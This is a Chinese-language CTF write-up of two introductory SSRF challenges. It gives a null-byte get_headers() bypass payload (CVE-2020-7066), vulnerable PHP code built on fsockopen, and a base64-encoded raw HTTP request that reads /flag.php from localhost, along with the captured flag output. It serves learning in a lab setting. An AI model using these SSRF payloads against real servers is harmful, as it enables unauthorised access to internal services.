Web入门-SSRF漏洞

[GKCTF 2020]cve版签到

SSRF漏洞,结合CVE-2020-7066:get_headers()会被%00截断。

payload:

plaintext
1
?url=http://127.0.0.123%00www.ctfhub.com

注,如下返回格式为get_headers()的特征:

plaintext
1
2
3
4
5
6
7
8
9
10
11
12
Array
(
    [0] => HTTP/1.1 200 OK
    [1] => Date: Mon, 05 Jun 2023 12:32:32 GMT
    [2] => Server: Apache/2.4.38 (Debian)
    [3] => X-Powered-By: PHP/7.3.15
    [4] => FLAG: NSSCTF{586773c7-706a-4413-9456-f3d363f47288}
    [5] => Vary: Accept-Encoding
    [6] => Content-Length: 113
    [7] => Connection: close
    [8] => Content-Type: text/html; charset=UTF-8
)

[HNCTF 2022 WEEK2]ez_ssrf

php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php

highlight_file(__FILE__);
error_reporting(0);

$data=base64_decode($_GET['data']);
$host=$_GET['host'];
$port=$_GET['port'];

$fp=fsockopen($host,intval($port),$error,$errstr,30);
if(!$fp) {
    die();
}
else {
    fwrite($fp,$data);
    while(!feof($data))
    {
        echo fgets($fp,128);
    }
    fclose($fp);
}

fsockopen是一个用于在PHP中建立网络连接的函数。它可以通过TCP或UDP协议与远程服务器进行通信,并返回一个文件指针,可以在该连接上进行读写操作。

构造这个的Base64:

plaintext
1
2
3
GET /flag.php HTTP/1.1
Host: 127.0.0.1
Connection: Close

EXP:

plaintext
1
/?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=